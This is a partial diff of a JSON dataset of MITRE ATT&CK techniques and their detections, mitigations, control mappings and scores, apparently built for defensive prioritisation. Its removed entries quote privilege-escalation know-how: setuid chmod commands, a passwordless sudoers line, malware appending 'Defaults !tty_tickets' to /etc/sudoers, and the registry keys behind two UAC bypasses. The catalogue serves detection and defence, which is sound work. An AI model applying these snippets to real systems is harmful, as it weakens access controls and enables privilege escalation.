+        "name": "Encrypted Channel",
+        "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.",
+        "url": "https://attack.mitre.org/techniques/T1573",
         "tactics": [
-            "Defense Evasion",
-            "Privilege Escalation"
+            "Command And Control"
         ],
-        "detection": "Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).\n\nConsider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.\n\nOn Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.\n\nThere are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.",
+        "detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
         "platforms": [
             "Linux",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "File: File Metadata",
-            "File: File Modification",
-            "Process: OS API Execution",
-            "Process: Process Creation",
-            "Process: Process Metadata",
-            "Windows Registry: Windows Registry Key Modification"
+            "Network Traffic: Network Traffic Content"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1548.001",
-                "name": "Abuse Elevation Control Mechanism: Setuid and Setgid",
-                "url": "https://attack.mitre.org/techniques/T1548/001",
-                "description": "An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges.\n\nInstead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file].\n\nAdversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware).",
-                "detection": "Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.",
-                "mitigations": [
-                    {
-                        "mid": "M1028",
-                        "name": "Operating System Configuration",
-                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1028"
-                    }
-                ]
-            },
-            {
-                "tid": "T1548.002",
-                "name": "Abuse Elevation Control Mechanism: Bypass User Account Control",
-                "url": "https://attack.mitre.org/techniques/T1548/002",
-                "description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)\n\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)",
-                "detection": "There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes.\n\nSome UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:\n\n* The eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Classes\\mscfile\\shell\\open\\command Registry key.(Citation: enigma0x3 Fileless UAC Bypass)\n\n* The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe and [HKEY_CURRENT_USER]\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)\n\nAnalysts should monitor these Registry settings for unauthorized changes.",
+                "tid": "T1573.001",
+                "name": "Encrypted Channel: Symmetric Cryptography",
+                "url": "https://attack.mitre.org/techniques/T1573/001",
+                "description": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.",
+                "detection": "With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
                 "mitigations": [
                     {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1051",
-                        "name": "Update Software",
-                        "description": "Perform regular software updates to mitigate exploitation risk.",
-                        "url": "https://attack.mitre.org/mitigations/M1051"
-                    },
-                    {
-                        "mid": "M1052",
-                        "name": "User Account Control",
-                        "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
-                        "url": "https://attack.mitre.org/mitigations/M1052"
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
                     }
                 ]
             },
             {
-                "tid": "T1548.003",
-                "name": "Abuse Elevation Control Mechanism: Sudo and Sudo Caching",
-                "url": "https://attack.mitre.org/techniques/T1548/003",
-                "description": "Adversaries may perform sudo caching and/or use the suoders file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.\n\nWithin Linux and MacOS systems, sudo (sometimes referred to as \"superuser do\") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\"(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\n\nThe sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware). Elevated privileges are required to edit this file though.\n\nAdversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.\n\nIn the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \\'Defaults !tty_tickets\\' >> /etc/sudoers (Citation: cybereason osx proton). In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.",
-                "detection": "On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.",
+                "tid": "T1573.002",
+                "name": "Encrypted Channel: Asymmetric Cryptography",
+                "url": "https://attack.mitre.org/techniques/T1573/002",
+                "description": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.\n\nFor efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).",
+                "detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
                 "mitigations": [
                     {
-                        "mid": "M1028",
-                        "name": "Operating System Configuration",
-                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1028"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
                     },
                     {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    }
-                ]
-            },
-            {
-                "tid": "T1548.004",
-                "name": "Abuse Elevation Control Mechanism: Elevated Execution with Prompt",
-                "url": "https://attack.mitre.org/techniques/T1548/004",
-                "description": "Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. \n\nAlthough this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.\n\nAdversaries may abuse AuthorizationExecuteWithPrivileges to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)",
-                "detection": "Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.",
-                "mitigations": [
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
+                        "mid": "M1020",
+                        "name": "SSL/TLS Inspection",
+                        "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.",
+                        "url": "https://attack.mitre.org/mitigations/M1020"
                     }
                 ]
             }
         ],
         "mitigations": [
             {
-                "mid": "M1047",
-                "name": "Audit",
-                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                "url": "https://attack.mitre.org/mitigations/M1047"
-            },
-            {
-                "mid": "M1038",
-                "name": "Execution Prevention",
-                "description": "Block execution of code on a system through application control, and/or script blocking.",
-                "url": "https://attack.mitre.org/mitigations/M1038"
-            },
-            {
-                "mid": "M1028",
-                "name": "Operating System Configuration",
-                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                "url": "https://attack.mitre.org/mitigations/M1028"
-            },
-            {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
-            },
-            {
-                "mid": "M1022",
-                "name": "Restrict File and Directory Permissions",
-                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1022"
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
             },
             {
-                "mid": "M1052",
-                "name": "User Account Control",
-                "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
-                "url": "https://attack.mitre.org/mitigations/M1052"
+                "mid": "M1020",
+                "name": "SSL/TLS Inspection",
+                "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.",
+                "url": "https://attack.mitre.org/mitigations/M1020"
             }
         ],
-        "cumulative_score": 1.3063831233333334,
-        "adjusted_score": 1.3063831233333334,
+        "cumulative_score": 0.22426968380952383,
+        "adjusted_score": 0.22426968380952383,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-12",
+            "SC-16",
+            "SC-23",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.12380952380952381,
+            "mitigation_score": 0.23636363636363636
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00046016
+    },
+    {
+        "tid": "T1573.001",
+        "name": "Encrypted Channel: Symmetric Cryptography",
+        "description": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.",
+        "url": "https://attack.mitre.org/techniques/T1573/001",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1573",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.22380952380952382,
+        "adjusted_score": 0.22380952380952382,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
-            "2.5",
-            "3.3",
-            "4.1",
-            "4.7",
-            "5.3",
-            "5.4",
-            "6.1",
-            "6.2",
-            "6.8",
-            "18.3",
-            "18.5"
+            "13.3",
+            "13.8"
         ],
         "nist_controls": [
-            "AC-16",
-            "AC-2",
-            "AC-3",
-            "AC-5",
-            "AC-6",
+            "AC-4",
             "CA-7",
-            "CA-8",
             "CM-2",
-            "CM-5",
             "CM-6",
             "CM-7",
-            "CM-8",
-            "IA-2",
-            "RA-5",
-            "SC-18",
-            "SC-34",
-            "SI-12",
-            "SI-16",
+            "SC-12",
+            "SC-16",
+            "SC-23",
+            "SC-7",
             "SI-3",
-            "SI-4",
-            "SI-7"
+            "SI-4"
         ],
-        "process_coverage": true,
-        "network_coverage": false,
-        "file_coverage": true,
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.33333333333333337,
-            "mitigation_score": 0.5818181818181818,
-            "detection_score": 0.06
-        },
-        "choke_point_score": 0.35,
-        "prevalence_score": 0.62304979
+        "hardware_coverage": false
     },
     {
-        "tid": "T1550",
-        "name": "Use Alternate Authentication Material",
-        "description": "Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. \n\nAuthentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)\n\nCaching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.\n",
-        "url": "https://attack.mitre.org/techniques/T1550",
+        "tid": "T1573.002",
+        "name": "Encrypted Channel: Asymmetric Cryptography",
+        "description": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.\n\nFor efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).",
+        "url": "https://attack.mitre.org/techniques/T1573/002",
         "tactics": [
-            "Defense Evasion",
-            "Lateral Movement"
+            "Command And Control"
         ],
-        "detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).",
+        "detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
         "platforms": [
-            "Google Workspace",
-            "IaaS",
-            "Office 365",
-            "SaaS",
-            "Windows"
+            "Linux",
+            "Windows",
+            "macOS"
         ],
         "data_sources": [
-            "Active Directory: Active Directory Credential Request",
-            "Application Log: Application Log Content",
-            "Logon Session: Logon Session Creation",
-            "User Account: User Account Authentication",
-            "Web Credential: Web Credential Usage"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1550.001",
-                "name": "Use Alternate Authentication Material: Application Access Token",
-                "url": "https://attack.mitre.org/techniques/T1550/001",
-                "description": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)\n\nFor example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\n\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.",
-                "detection": "Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs.",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1041",
-                        "name": "Encrypt Sensitive Information",
-                        "description": "Protect sensitive information with strong encryption.",
-                        "url": "https://attack.mitre.org/mitigations/M1041"
-                    },
-                    {
-                        "mid": "M1021",
-                        "name": "Restrict Web-Based Content",
-                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1021"
-                    }
-                ]
-            },
-            {
-                "tid": "T1550.002",
-                "name": "Use Alternate Authentication Material: Pass the Hash",
-                "url": "https://attack.mitre.org/techniques/T1550/002",
-                "description": "Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.\n\nWhen performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.\n\nAdversaries may also use stolen password hashes to \"overpass the hash.\" Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)",
-                "detection": "Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.\n\nEvent ID 4768 and 4769 will also be generated on the Domain Controller when a user requests a new ticket granting ticket or service ticket. These events combined with the above activity may be indicative of an overpass the hash attempt.(Citation: Stealthbits Overpass-the-Hash)",
-                "mitigations": [
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    },
-                    {
-                        "mid": "M1051",
-                        "name": "Update Software",
-                        "description": "Perform regular software updates to mitigate exploitation risk.",
-                        "url": "https://attack.mitre.org/mitigations/M1051"
-                    },
-                    {
-                        "mid": "M1052",
-                        "name": "User Account Control",
-                        "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
-                        "url": "https://attack.mitre.org/mitigations/M1052"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
-            },
-            {
-                "tid": "T1550.003",
-                "name": "Use Alternate Authentication Material: Pass the Ticket",
-                "url": "https://attack.mitre.org/techniques/T1550/003",
-                "description": "Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\n\nWhen preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)\n\nA [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)\n\nA [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)\n\nAdversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, \"overpassing the hash\" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)",
-                "detection": "Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.\n\nEvent ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to \"Integrity check on decrypted field failed\" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)",
-                "mitigations": [
-                    {
-                        "mid": "M1015",
-                        "name": "Active Directory Configuration",
-                        "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1015"
-                    },
-                    {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
